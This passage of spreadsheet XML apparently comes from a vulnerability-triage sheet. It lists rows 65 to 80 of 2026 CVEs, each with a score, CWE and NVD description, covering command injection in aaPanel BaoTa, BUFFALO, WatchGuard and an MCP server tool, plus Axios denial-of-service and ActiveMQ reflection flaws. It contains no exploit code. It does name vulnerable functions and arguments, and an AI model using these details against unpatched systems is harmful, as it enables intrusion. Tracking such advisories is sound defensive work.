      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>BUFFALO Wi-Fi products handle some web form input improperly to assemble command line strings internally. An administrative user may send a crafted HTTP request and execute an arbitrary OS command.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86530</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87969</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the WatchGuard AP diagnostic CLI allows an authenticated administrator to execute arbitrary operating system commands by supplying crafted input.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87969</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100750</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - LFI / SSRF in Modules Anywhere 1.5.0 - 9.0.5 for Joomla - Modules Anywhere Pro lets additional attributes on a module tag replace arbitrary parameters of the selected module. This feature is enabled by default in affected versions. The overrides are applied without checking who authored the content containing the tag. The security effect depends on how the selected module consumes the replaced parameter. Joomla's core Feed module provides a concrete affected path: its rssurl parameter is opened by the server and accepts local file: URLs as well as network URLs.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100750</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101007</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in aaPanel BaoTa up to 11.8.0. This issue affects the function InputSql of the file class/database.py of the component Database Backup Handler. Such manipulation of the argument Password leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101007</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101008</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in aaPanel BaoTa up to 11.8.0. Impacted is the function merge_split_file of the file /www/server/panel/class/files.py of the component File Merge Handler. Performing a manipulation of the argument split_file_path results in command injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101008</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101009</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in aaPanel BaoTa up to 11.8.0. The affected element is the function panelTask.bt_task._unzip of the file /www/server/panel/class/panelTask.py of the component Unzip Handler. Executing a manipulation of the argument Password can lead to os command injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101009</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55157</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Token Optimizer MCP measures token savings per AI coding agent, optimizes context, and shares a live local knowledge graph across 16 CLI clients. Prior to version 5.1.0, token-optimizer-mcp is vulnerable to OS command injection in the smart_user tool. Any MCP client that can call the smart_user tool can execute arbitrary shell commands through the username argument of the get-user-info operation. The commands execute with the privileges of the user running the token-optimizer-mcp server. This issue has been patched in version 5.1.0.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55157</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101073</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Netcore NR289-GE 1.4.5102. Impacted is an unknown function of the file /bin/boa of the component CGI Dispatcher. Performing a manipulation results in improper authentication. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101073</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101188</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Netcore POWER13 2.0.240730.162638. This issue affects the function routerd.passwd_set of the file /ubus. Such manipulation leads to weak password recovery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101188</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 0.28.0 until 0.34.0 and 1.15.1 until 1.20.0, ToFormData processes inherited serialization options and visitor properties supplied through prototype pollution. A separate same-process prototype-pollution flaw supplies inherited dots, indexes, metaTokens, maxDepth, visitor, or Blob values before object serialization. The inherited options alter toFormData field naming and data interpretation, maxDepth can force request failure, Blob changes value handling, and a polluted visitor can execute when an attacker already has the stronger ability to inject a function. Serialized field naming and data interpretation can change, maxDepth can cause request failure, Blob can alter value handling, and a polluted visitor can execute under the stronger function-injection primitive. This issue is fixed in versions 0.34.0 and 1.20.0.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81375</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-610</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>A Confused Deputy vulnerability in the EmailTask component in Google Cloud Application Integration versions prior to 2026-06-30 on Google Cloud Platform allows an authenticated attacker to read and exfiltrate arbitrary Google-internal files via a crafted attachment file path.
This vulnerability was patched on 30 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81375</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101292</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Apache ActiveMQ Artemis before 2.34.0 contains an unsafe reflection vulnerability in FederationStreamConnectMessage.getFederationPolicy(). The method calls Class.forName(clazz).getConstructor().newInstance() where clazz is read directly from the CORE protocol wire buffer without type validation. An authenticated federation peer can send a FEDERATION_DOWNSTREAM_CONNECT packet with a crafted class name, causing the broker to load and instantiate arbitrary classes visible to the Artemis module classloader. Static initializers (&lt;clinit&gt;) and no-argument constructors (&lt;init&gt;()) execute as side effects before the type cast, enabling denial of service via system-property poisoning, out-of-memory conditions via classloading, or broker state manipulation.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101292</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.13.0 until 1.20.0, Http2Sessions does not install adequate error handling for a ClientHttp2Session during Axios HTTP/2 session initialization or reuse. A request uses httpVersion: 2 and the ClientHttp2Session emits an error during session initialization or reuse. The unhandled session error escapes normal Promise rejection handling. The uncaught error can terminate the Node.js process and cause denial of service. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, express, gin</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.16.1 until 1.20.0, the RFC 2397 regular expression allows slash characters on both sides of the media-type separator. An application passes an attacker-controlled malformed data URL containing many slash characters and no comma. the JavaScript regular-expression engine explores many separator placements before rejecting the URL. Synchronous excessive backtracking can block the Node.js event loop and cause denial of service. The affected identifiers are fromDataURI, DATA_URL_PATTERN, data:. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, express</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.15.0 until 1.20.0, Axios shouldBypassProxy applies a quadratic trailing-dot regular expression to redirect hostnames. HTTP_PROXY or HTTPS_PROXY is configured, NO_PROXY or no_proxy is non-empty, redirects are followed, and a crafted redirect Location contains many dots followed by a non-dot character. Hostname.replace(/.+$/, '') backtracks quadratically while processing the crafted redirect hostname. Synchronous regular-expression processing can block the Node.js event loop and cause denial of service. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54160</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>github, rust</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
